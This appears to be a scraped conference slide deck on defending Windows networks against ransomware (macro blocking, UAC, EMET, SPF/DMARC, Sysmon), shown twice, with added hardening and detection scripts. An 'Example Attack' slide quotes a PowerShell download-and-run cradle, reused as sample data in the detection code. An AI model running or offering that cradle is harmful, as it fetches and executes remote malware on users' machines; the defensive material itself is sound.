Ransomware 0: Admins 1
Kieran Jacobsen
Kieran Jacobsen
• Work at Readify
• Technical Lead
• Twitter: @Kjacobsen
• Poshsecurity.com
• PlanetPowerShell.com
What Is Ransomware?
The impact of ransomware
(Bar chart on a 0% to 100% scale; not reproduced here.)
Source: CyberEdge
Threat Hierarchy
1. Malware (viruses, worms, trojans).
2. Phishing.
3. Insider threats.
4. APT.
5. Ransomware.
6. Web application attacks.
7. SSL-encrypted threats.
8. DoS/DDoS.
9. Drive-by and watering-hole attacks.
Source: CyberEdge
Impacted Verticals
(Bar chart on a 0% to 80% scale, by vertical: Technology, Financial Services, Healthcare, Government; not reproduced here.)
Source: CyberEdge
The Rising Cost of Ransomware
Bitcoin Exchange Rate (USD)
How Does it Get in?
(Bar chart on a 0% to 35% scale, by infection vector: email link, email attachment, website (non-social media), social media, USB stick, business application, unknown; not reproduced here.)
Source: Osterman Research
An Example Attack
cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://<omitted>/2011/stinfo.pdf','%TMP%yvatu.exe');Start-Process '%TMP%yvatu.exe'
Reducing the Risks
1. Disable macros
• Significantly impacts infection chain.
• 31% of ransomware infections came from email attachments, typically a Word document with macros.
• Either:
• Disable All
• Disable macros marked as from the internet
• https://decentsecurity.com/enterprise/#/block-office-macros/
2. Don’t run as admin
• Significantly impacts infection chain.
• Rethink developer and sysadmin privileges.
• Old rant by Jeff Atwood: https://blog.codinghorror.com/the-windows-security-epidemic-dont-run-as-an-administrator/
3. Configure UAC
• UAC elevation requests are passed to the Antimalware Scan Interface (AMSI).
• https://www.tenforums.com/tutorials/3577-change-user-account-control-uac-settings-windows-10-a.html
4. Open scripts in notepad
• .ps1 files do not execute when double-clicked.
• Change the following to open in notepad:
• .bat (often overlooked)
• .vbe and .vbs
• .wsh and .wsf
• .js and .jse
• http://www.dankalia.com/tutor/01002/0100201018.htm
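The three registry-based controls from items 1, 3 and 4 (macro blocking, UAC, script extensions opening in Notepad) applied and then audited in one script. This is an added example, not code from the slides; it assumes Office 2016/365 (policy key version 16.0) and an elevated PowerShell session, and the Office keys are per-user (HKCU), so in production they belong in Group Policy rather than a per-machine script.

```powershell
# Added example, not part of the original slides. Applies the registry-based
# controls behind items 1 (macros), 3 (UAC) and 4 (script extensions open in
# Notepad), then audits them. Run from an elevated PowerShell. Assumptions:
# Office 2016/365 (policy key version 16.0); the Office keys live under HKCU,
# so in production push them with Group Policy rather than per machine.
$ErrorActionPreference = 'Stop'

# Item 1: VBAWarnings 4 = disable all macros without notification (use 3 to
# allow only digitally signed macros); BlockContentExecutionFromInternet 1 =
# block macros in files that carry the Mark-of-the-Web (downloaded/attached).
$officeBase  = 'HKCU:\SOFTWARE\Policies\Microsoft\Office\16.0'
$officeApps  = 'Word', 'Excel', 'PowerPoint'
$macroValues = @{ VBAWarnings = 4; BlockContentExecutionFromInternet = 1 }

# Item 3: UAC on, administrators prompted for consent on the secure desktop.
$uacPath   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$uacValues = @{ EnableLUA = 1; ConsentPromptBehaviorAdmin = 2; PromptOnSecureDesktop = 1 }

# Item 4: ProgIDs behind .bat, .vbs, .vbe, .wsh, .wsf, .js and .jse.
# (.ps1 already opens in Notepad by default, so it is left alone.)
$scriptProgIds  = 'batfile', 'VBSFile', 'VBEFile', 'WSHFile', 'WSFFile', 'JSFile', 'JSEFile'
$notepadCommand = "$env:SystemRoot\System32\notepad.exe `"%1`""

function Set-DwordValue {
    param([string]$Path, [string]$Name, [int]$Value)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType DWord -Force | Out-Null
}

function Set-RansomwareHardening {
    foreach ($app in $officeApps) {
        $p = Join-Path $officeBase "$app\Security"
        foreach ($name in $macroValues.Keys) { Set-DwordValue $p $name $macroValues[$name] }
    }
    foreach ($name in $uacValues.Keys) { Set-DwordValue $uacPath $name $uacValues[$name] }
    foreach ($id in $scriptProgIds) {
        # Writing through HKCR lands in HKLM\SOFTWARE\Classes, i.e. machine-wide;
        # a per-user override under HKCU\SOFTWARE\Classes would still win.
        $p = "Registry::HKEY_CLASSES_ROOT\$id\Shell\Open\Command"
        if (-not (Test-Path $p)) { New-Item -Path $p -Force | Out-Null }
        Set-ItemProperty -Path $p -Name '(default)' -Value $notepadCommand
    }
}

function Test-RansomwareHardening {
    # One row per control, so drift can be spotted in a report or shipped to a SIEM.
    $rows = foreach ($app in $officeApps) {
        $v = Get-ItemProperty -Path (Join-Path $officeBase "$app\Security") -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Control = "$app macros blocked"
            Ok      = ($v.VBAWarnings -eq 4 -and $v.BlockContentExecutionFromInternet -eq 1)
        }
    }
    $u = Get-ItemProperty -Path $uacPath -ErrorAction SilentlyContinue
    $rows += [pscustomobject]@{
        Control = 'UAC consent prompt on secure desktop'
        Ok      = ($u.EnableLUA -eq 1 -and $u.ConsentPromptBehaviorAdmin -eq 2 -and $u.PromptOnSecureDesktop -eq 1)
    }
    $rows += foreach ($id in $scriptProgIds) {
        $cmd = (Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\$id\Shell\Open\Command" -ErrorAction SilentlyContinue).'(default)'
        [pscustomobject]@{ Control = "$id opens in Notepad"; Ok = ("$cmd" -like '*notepad.exe*') }
    }
    $rows
}

Set-RansomwareHardening
Test-RansomwareHardening | Format-Table -AutoSize
```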
5a. EMET
• Enhanced Mitigation Experience Toolkit – new EOL date 2018-08-31.
• Applies security mitigation technologies to running applications: DEP, SEHOP, Null Page, Heap Spray, EAF, EAF+, Mandatory ASLR, Bottom Up ASLR, Load Lib, Memory Protection, Caller, Sim Exec Flow, Stack Pivot, ASR.
• Provides configurable SSL/TLS certificate pinning.
• Provides the ability to block untrusted fonts.
• Group Policy ADM/ADMX files.
• Bundled with recommended protections for a variety of Microsoft and 3rd-party apps.
• Disable protections on Chrome due to conflicts.
• http://www.zdnet.com/article/emet-your-enterprise-for-peak-windows-security/
5b. Inbuilt protections in Windows 10
• Windows:
• Windows 10, version 1607 and later
• Windows Server 2016
• On for all 64-bit processes: DEP, SEHOP and ASLR.
• Configurable protections: DEP, DEP-ATL Thunk, SEHOP, Mandatory ASLR, Bottom Up ASLR.
• Configurable by, well, Group Policy.
• https://technet.microsoft.com/en-us/itpro/windows/keep-secure/override-mitigation-options-for-app-related-security-policies?f=255&MSPPError=-2147217396
6. Deploy Chrome and Firefox
• Reduces issues caused by users attempting to install 3rd party browsers.
• Chrome is the leader of the pack, followed by Edge for security.
• Chrome has ADM/ADMX files for Group Policy; Firefox has 3rd-party Group Policy support.
• Chrome: http://goo.gl/2QvOT
• Firefox: https://developer.mozilla.org/en-US/Firefox/Enterprise_deployment
7. Block Ads
• Internet Explorer: https://decentsecurity.com/adblocking-for-internet-explorer-deployment/
• Edge: https://www.microsoft.com/en-us/store/p/adblock/9nblggh4rfhk
• Chrome: https://decentsecurity.com/ublock-for-google-chrome-deployment/
• Firefox: https://decentsecurity.com/ublock-for-firefox-deployment/
8. Filter common email attacks
• Identify common phrases and syntax in phishing and ransomware emails.
• Quarantine them before they get to your users.
• https://github.com/SwiftOnSecurity/PhishingRegex
9. Enable SPF, DKIM and DMARC
• SPF: the domain owner specifies the servers allowed to send its email.
• DKIM: a domain asserts responsibility for the emails it sends.
• DMARC: combines SPF and DKIM, and allows policy assertions and collection of reporting data.
• https://dmarc.org/presentations/Email-Authentication-Basics-2015Q2.pdf
Alexa Top 500 - DMARC Usage
(Chart: DMARC vs. No DMARC; not reproduced here.)
Source: Detectify
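A checker for item 9 that parses SPF and DMARC TXT records and grades them from a defender's point of view: SPF should end in a hard fail and stay inside the 10-lookup limit, and DMARC should actually enforce and collect reports. This is an added example, not the slides' own code; the two domains and their records at the bottom are constructed samples, and `Get-DomainMailAuth` uses `Resolve-DnsName` (Windows 8/Server 2012 and later) for a live lookup.

```powershell
# Added example, not part of the original slides. Grades SPF and DMARC records the
# way a defender checking item 9 would: SPF should end in a hard fail (-all) and stay
# within the 10-lookup limit; DMARC should enforce (p=quarantine or reject at pct=100)
# and collect aggregate reports (rua=). The records at the bottom are constructed
# samples; Get-DomainMailAuth does a live lookup with Resolve-DnsName for a real domain.

function Test-SpfRecord {
    param([string]$Record)
    if ($Record -notmatch '^v=spf1(\s|$)') {
        return [pscustomobject]@{ Valid = $false; Note = 'not an SPF record' }
    }
    $terms = $Record.Trim() -split '\s+'
    # The last "all" mechanism decides what happens to senders that match nothing.
    $all = @($terms | Where-Object { $_ -match '^[+\-~?]?all$' })[-1]
    # Mechanisms and modifiers that cost a DNS lookup (RFC 7208 caps these at 10).
    $lookups = @($terms | Where-Object { $_ -match '^[+\-~?]?(include:|a$|a:|mx$|mx:|ptr|exists:)|^redirect=' }).Count
    $grade = if ($all -eq '-all') { 'hard fail (good)' }
             elseif ($all -eq '~all') { 'soft fail (weak)' }
             else { 'no fail (ineffective)' }
    [pscustomobject]@{
        Valid = $true; AllMechanism = $all; Grade = $grade
        DnsLookups = $lookups; TooManyLookups = ($lookups -gt 10)
    }
}

function Test-DmarcRecord {
    param([string]$Record)
    if ($Record -notmatch '^v=DMARC1\s*;') {
        return [pscustomobject]@{ Valid = $false; Note = 'not a DMARC record' }
    }
    # DMARC is a semicolon-separated tag=value list.
    $tags = @{}
    foreach ($part in ($Record -split ';')) {
        if ($part -match '^\s*(\w+)\s*=\s*(.+?)\s*$') { $tags[$matches[1]] = $matches[2] }
    }
    $pct = if ($tags.ContainsKey('pct')) { [int]$tags['pct'] } else { 100 }
    [pscustomobject]@{
        Valid            = $true
        Policy           = $tags['p']
        Percent          = $pct
        Enforcing        = ($tags['p'] -in 'quarantine', 'reject') -and ($pct -eq 100)
        AggregateReports = $tags.ContainsKey('rua')
        # Subdomains inherit p= unless sp= overrides it.
        SubdomainPolicy  = if ($tags.ContainsKey('sp')) { $tags['sp'] } else { $tags['p'] }
    }
}

function Get-DomainMailAuth {
    param([string]$Domain)
    # Long TXT records come back split into several strings; join them first.
    $txt = { param($name) Resolve-DnsName -Name $name -Type TXT -ErrorAction SilentlyContinue |
             Where-Object { $_.Strings } | ForEach-Object { $_.Strings -join '' } }
    $spf   = @(& $txt $Domain | Where-Object { $_ -like 'v=spf1*' })[0]
    $dmarc = @(& $txt "_dmarc.$Domain" | Where-Object { $_ -like 'v=DMARC1*' })[0]
    [pscustomobject]@{
        Domain = $Domain
        Spf    = if ($spf)   { Test-SpfRecord $spf }     else { 'missing' }
        Dmarc  = if ($dmarc) { Test-DmarcRecord $dmarc } else { 'missing' }
    }
}

# Constructed sample records (not real domains).
$samples = [ordered]@{
    'weak.example'   = @{ spf   = 'v=spf1 include:_spf.example.net ~all'
                          dmarc = 'v=DMARC1; p=none; rua=mailto:dmarc@weak.example' }
    'strong.example' = @{ spf   = 'v=spf1 mx include:_spf.example.net -all'
                          dmarc = 'v=DMARC1; p=reject; rua=mailto:dmarc@strong.example; sp=reject' }
}
foreach ($domain in $samples.Keys) {
    "== $domain"
    Test-SpfRecord   $samples[$domain].spf   | Format-List | Out-String
    Test-DmarcRecord $samples[$domain].dmarc | Format-List | Out-String
}
# Live check of your own domain: Get-DomainMailAuth 'yourdomain.example'
```

The weak sample grades as soft fail with p=none (monitoring only); the strong one as hard fail with an enforcing reject policy that also covers subdomains.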
10. Implement SYSMON
Sysmon from Microsoft ( https://technet.microsoft.com/en-us/sysinternals/sysmon )
+
Configuration from Swift on Security ( https://github.com/SwiftOnSecurity/sysmon-config/ )
+
Free SIEM from Gray Log ( https://www.graylog.org/ )
+
Sysmon for Graylog ( https://github.com/ion-storm/Graylog_Sysmon )
=
Awesome Dashboard
Source: @ionstorm
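Once Sysmon is in place, the chain from the "An Example Attack" slide (Word macro spawning cmd, which spawns PowerShell to download and run a file) is visible in Event ID 1. The detection below is an added example, not part of the slides or of the SwiftOnSecurity configuration: `Get-SysmonProcessEvents` reads the live Sysmon log, `Test-SuspiciousProcess` applies three rules of this example's own design, and the constructed events at the end let it run offline.

```powershell
# Added example, not part of the original slides or of the SwiftOnSecurity Sysmon
# config. Pulls Sysmon process-creation events (Event ID 1) and flags the chain
# behind the "An Example Attack" slide: a script host launched by an Office app,
# and a PowerShell/cmd command line that downloads a file and then starts it.
# Get-SysmonProcessEvents reads the live Sysmon log; the constructed events at the
# end exercise the rules offline. Rule names and patterns are this example's own.

$officeParents = 'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe'
$scriptHosts   = 'powershell.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'

function Get-SysmonProcessEvents {
    param([int]$MaxEvents = 1000)
    Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' `
                 -FilterXPath '*[System[EventID=1]]' -MaxEvents $MaxEvents |
        ForEach-Object {
            # Sysmon puts every field in EventData/Data[@Name]; flatten to a hashtable.
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                User        = $data['User']
                Image       = $data['Image']
                CommandLine = $data['CommandLine']
                ParentImage = $data['ParentImage']
            }
        }
}

function Test-SuspiciousProcess {
    param($Event)
    $image  = [IO.Path]::GetFileName("$($Event.Image)")
    $parent = [IO.Path]::GetFileName("$($Event.ParentImage)")
    $cmd    = "$($Event.CommandLine)"
    $reasons = @()
    # Rule 1: Office applications have no business launching script hosts.
    if (($parent -in $officeParents) -and ($image -in $scriptHosts)) {
        $reasons += "script host $image spawned by Office process $parent"
    }
    # Rule 2: download primitive and execution primitive in the same command line.
    if (($image -in 'powershell.exe', 'cmd.exe') -and
        ($cmd -match 'DownloadFile|DownloadString|Invoke-WebRequest|Net\.WebClient') -and
        ($cmd -match 'Start-Process|Invoke-Expression|\bIEX\b|Invoke-Item')) {
        $reasons += 'download-then-execute command line'
    }
    # Rule 3: encoded or hidden-window PowerShell (-match is case-insensitive).
    if (($cmd -match '(^|\s)-(e|ec|enc|encodedcommand)\s') -or ($cmd -match '-w(indowstyle)?\s+hidden')) {
        $reasons += 'encoded or hidden-window PowerShell'
    }
    [pscustomobject]@{
        Suspicious  = ($reasons.Count -gt 0)
        Reasons     = ($reasons -join '; ')
        Image       = $image
        Parent      = $parent
        CommandLine = $cmd
    }
}

# Constructed Sysmon-style records reproducing the slide's chain (Word -> cmd ->
# PowerShell) plus one benign PowerShell launch from Explorer. URL kept as <omitted>.
$sampleEvents = @(
    [pscustomobject]@{
        Image       = 'C:\Windows\System32\cmd.exe'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        CommandLine = 'cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile(''http://<omitted>/2011/stinfo.pdf'',''%TMP%\yvatu.exe'');Start-Process ''%TMP%\yvatu.exe'''
    }
    [pscustomobject]@{
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'PowerShell (New-Object System.Net.WebClient).DownloadFile(''http://<omitted>/2011/stinfo.pdf'',''%TMP%\yvatu.exe'');Start-Process ''%TMP%\yvatu.exe'''
    }
    [pscustomobject]@{
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = 'powershell.exe -NoProfile -Command Get-Service -Name Spooler'
    }
)
$sampleEvents | ForEach-Object { Test-SuspiciousProcess $_ } | Format-List
# Live: Get-SysmonProcessEvents | ForEach-Object { Test-SuspiciousProcess $_ } | Where-Object Suspicious
```

The first two constructed events trip rules 1 and 2 respectively (the cmd.exe one trips both), and the Explorer-launched PowerShell is left alone; the same objects feed a Graylog extractor or alert just as well as Format-List.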
Thank You
www.expertslive.org.au
#expertsliveau

Neuro-symbolic is not enough, we need neuro-*semantic*
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 

Ransomware 0 admins 1

1. Ransomware 0: Admins 1
Kieran Jacobsen

2. Kieran Jacobsen
• Work at Readify
• Technical Lead
• Twitter: @Kjacobsen
• Poshsecurity.com
• PlanetPowerShell.com

4. The impact of ransomware
(Bar chart, 0% to 100% scale. Source: CyberEdge)

5. Threat Hierarchy
  1. Malware (viruses, worms, trojans).
  2. Phishing.
  3. Insider threats.
  4. APT.
  5. Ransomware.
  6. Web Application Attacks.
  7. SSL-encrypted threats.
  8. DoS/DDoS.
  9. Drive-by & watering-hole.
Source: CyberEdge

6. Impacted Verticals
(Bar chart, 0% to 80% scale, for Technology, Financial Services, Healthcare and Government. Source: CyberEdge)

7. The Rising Cost of Ransomware
(Chart: Bitcoin Exchange Rate (USD))

8. How Does it Get in?
(Bar chart, 0% to 35% scale, of infection vectors: Email link, Email attachment, Website (non-social media), Social Media, USB Stick, Business Application, Unknown. Source: Osterman Research)
17.
cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://<omitted>/2011/stinfo.pdf','%TMP%yvatu.exe');Start-Process '%TMP%yvatu.exe
21. 1. Disable macros
• Significantly impacts infection chain.
• 31% of ransomware infections came from email attachments, typically Word documents with macros.
• Either:
  • Disable all
  • Disable macros marked as from the internet
• https://decentsecurity.com/enterprise/#/block-office-macros/

22. 2. Don't run as admin
• Significantly impacts infection chain.
• Rethink developer and sysadmin privileges.
• Old rant by Jeff Atwood: https://blog.codinghorror.com/the-windows-security-epidemic-dont-run-as-an-administrator/

24. 3. Configure UAC
• UAC elevation requests are passed to the Antimalware Scan Interface (AMSI).
• https://www.tenforums.com/tutorials/3577-change-user-account-control-uac-settings-windows-10-a.html

25. 4. Open scripts in notepad
• .ps1 files do not execute when double-clicked.
• Change the following to open in notepad:
  • .bat (often overlooked)
  • .vbe and .vbs
  • .wsh and .wsf
  • .js and .jse
• http://www.dankalia.com/tutor/01002/0100201018.htm
26. 5a. EMET
• Enhanced Mitigation Experience Toolkit – new EOL date 2018-08-31.
• Applies security mitigation technologies to running applications: DEP, SEHOP, Null Page, Heap Spray, EAF, EAF+, Mandatory ASLR, Bottom Up ASLR, Load Lib, Memory Protection, Caller, Sim Exec Flow, Stack Pivot, ASR.
• Provides configurable SSL/TLS certificate pinning.
• Provides the ability to block untrusted fonts.
• Group Policy ADM/ADMX files.
• Bundled with recommended protections for a variety of Microsoft and 3rd party apps.
• Disable protections on Chrome due to conflicts.
• http://www.zdnet.com/article/emet-your-enterprise-for-peak-windows-security/

27. 5b. Inbuilt protections in Windows 10
• Windows:
  • Windows 10, version 1607 and later
  • Windows Server 2016
• On for all 64-bit processes: DEP, SEHOP and ASLR.
• Configurable protections: DEP, DEP-ATL Thunk, SEHOP, Mandatory ASLR, Bottom Up ASLR.
• Configurable by, well, Group Policy.
• https://technet.microsoft.com/en-us/itpro/windows/keep-secure/override-mitigation-options-for-app-related-security-policies?f=255&MSPPError=-2147217396

28. 6. Deploy Chrome and Firefox
• Reduces issues caused by users attempting to install 3rd party browsers.
• Chrome is the leader of the pack, followed by Edge, for security.
• Chrome has ADM/ADMX files for Group Policy; Firefox has 3rd party Group Policy support.
• Chrome: http://goo.gl/2QvOT
• Firefox: https://developer.mozilla.org/en-US/Firefox/Enterprise_deployment

30. 7. Block Ads
• Internet Explorer: https://decentsecurity.com/adblocking-for-internet-explorer-deployment/
• Edge: https://www.microsoft.com/en-us/store/p/adblock/9nblggh4rfhk
• Chrome: https://decentsecurity.com/ublock-for-google-chrome-deployment/
• Firefox: https://decentsecurity.com/ublock-for-firefox-deployment/

31. 8. Filter common email attacks
• Identify common phrases and syntax in phishing and ransomware emails.
• Quarantine them before they get to your users.
• https://github.com/SwiftOnSecurity/PhishingRegex

32. 9. Enable SPF, DKIM and DMARC
• SPF: the domain owner specifies which servers are allowed to send its email.
• DKIM: a domain asserts responsibility for the emails it sends.
• DMARC: combines SPF + DKIM, allows policy assertions and collection of data.
• https://dmarc.org/presentations/Email-Authentication-Basics-2015Q2.pdf

33. 9. Enable SPF, DKIM and DMARC
(Chart: Alexa Top 500 – DMARC Usage, DMARC vs No DMARC. Source: Detectify)
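Added example, not part of the deck: a small parser for the SPF and DMARC TXT records that slides 32 and 33 describe, which also reports whether the records merely observe (p=none, ~all) or actually enforce (p=quarantine/reject, -all). The records are constructed; example.com and example.net are placeholder domains.

```python
from typing import Dict, List, Tuple

SPF_QUALIFIERS = "+-~?"   # pass, hard fail, soft fail, neutral

def parse_spf(txt: str) -> Dict[str, object]:
    """Split a v=spf1 record into (qualifier, mechanism) pairs and its 'all' qualifier."""
    terms = txt.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    mechanisms: List[Tuple[str, str]] = []
    all_qualifier = None          # None means no 'all' term: effectively neutral
    for term in terms[1:]:
        qualifier = term[0] if term[0] in SPF_QUALIFIERS else "+"
        body = term.lstrip(SPF_QUALIFIERS)
        if body.lower() == "all":
            all_qualifier = qualifier
            break                 # terms after 'all' are never evaluated
        mechanisms.append((qualifier, body))
    return {"mechanisms": mechanisms, "all": all_qualifier}

def parse_dmarc(txt: str) -> Dict[str, str]:
    """Turn a v=DMARC1 record into a tag -> value dict (tags lower-cased)."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record")
    return tags

def enforcement(spf_txt: str, dmarc_txt: str) -> Dict[str, object]:
    """Summarise whether the record pair blocks spoofed mail or only observes it."""
    spf, dmarc = parse_spf(spf_txt), parse_dmarc(dmarc_txt)
    policy = dmarc.get("p", "none").lower()
    return {
        "spf_hard_fail": spf["all"] == "-",
        "dmarc_enforcing": policy in ("quarantine", "reject"),
        "dmarc_pct": int(dmarc.get("pct", "100")),     # share of mail the policy applies to
        "dmarc_reporting": "rua" in dmarc,             # aggregate reports requested
    }

# Constructed records; example.com / example.net are documentation domains.
MONITOR_ONLY = ("v=spf1 include:_spf.example.net ~all",
                "v=DMARC1; p=none; rua=mailto:dmarc@example.com")
ENFORCING = ("v=spf1 ip4:203.0.113.0/24 -all",
             "v=DMARC1; p=reject; pct=100; rua=mailto:dmarc@example.com; adkim=s")
```

A "No DMARC" domain in the Detectify chart would fail parse_dmarc outright; a p=none domain parses fine but shows dmarc_enforcing False, which is the more common and more easily missed gap.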
34. 10. Implement SYSMON
Sysmon from Microsoft (https://technet.microsoft.com/en-us/sysinternals/sysmon)
+ Configuration from Swift on Security (https://github.com/SwiftOnSecurity/sysmon-config/)
+ Free SIEM from Graylog (https://www.graylog.org/)
+ Sysmon for Graylog (https://github.com/ion-storm/Graylog_Sysmon)
= Awesome Dashboard
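Added example, not from the deck and not from Swift on Security's sysmon-config: the kind of triage rule a Graylog dashboard fed by Sysmon process-creation events (Event ID 1) could apply to catch the cmd /c PowerShell download-and-run chain shown on slide 17. Field names follow Sysmon's Event ID 1 schema (Image, ParentImage, CommandLine, ProcessId); the regexes and sample records are constructed here.

```python
import re
from typing import Dict, List, Tuple

# Patterns are this example's own, not SwiftOnSecurity's sysmon-config rules.
SCRIPT_ENGINE = re.compile(r"\\(powershell|pwsh|cmd)\.exe$", re.I)
OFFICE_OR_SCRIPT_HOST = re.compile(
    r"\\(winword|excel|powerpnt|outlook|wscript|cscript|mshta)\.exe$", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest", re.I)
TEMP_EXEC = re.compile(
    r"(%TMP%|%TEMP%|\\AppData\\Local\\Temp\\)[^'\" ]*\.(exe|scr|dll|js|vbs)", re.I)

def indicators(event: Dict[str, str]) -> List[str]:
    """Name the suspicious traits one Sysmon Event ID 1 record shows."""
    hits = []
    image, parent = event.get("Image", ""), event.get("ParentImage", "")
    cmdline = event.get("CommandLine", "")
    if SCRIPT_ENGINE.search(image) and OFFICE_OR_SCRIPT_HOST.search(parent):
        hits.append("script_engine_from_office")  # Word spawning cmd/PowerShell
    if SCRIPT_ENGINE.search(image) and DOWNLOAD_CRADLE.search(cmdline):
        hits.append("download_cradle")            # WebClient download in args
    if TEMP_EXEC.search(cmdline):
        hits.append("exec_from_temp")             # payload launched from %TMP%
    return hits

def triage(events: List[Dict[str, str]], threshold: int = 2) -> List[Tuple[int, List[str]]]:
    """Return (ProcessId, hits) for records matching at least `threshold` traits."""
    flagged = []
    for ev in events:
        hits = indicators(ev)
        if len(hits) >= threshold:
            flagged.append((int(ev["ProcessId"]), hits))
    return flagged

# Constructed records modelled on the deck's example attack; URL kept redacted.
CRADLE = ("PowerShell (New-Object System.Net.WebClient).DownloadFile("
          "'http://<omitted>/2011/stinfo.pdf','%TMP%\\yvatu.exe');"
          "Start-Process '%TMP%\\yvatu.exe'")
SAMPLE_EVENTS = [
    {"ProcessId": "4120", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": "cmd /c " + CRADLE},
    {"ProcessId": "4188", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": CRADLE},
    {"ProcessId": "5004", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\Get-Inventory.ps1"},
]
```

The threshold keeps a lone trait (an admin's scheduled PowerShell script, or a legitimate Invoke-WebRequest) from paging anyone, while both stages of the slide 17 chain trip at least two traits.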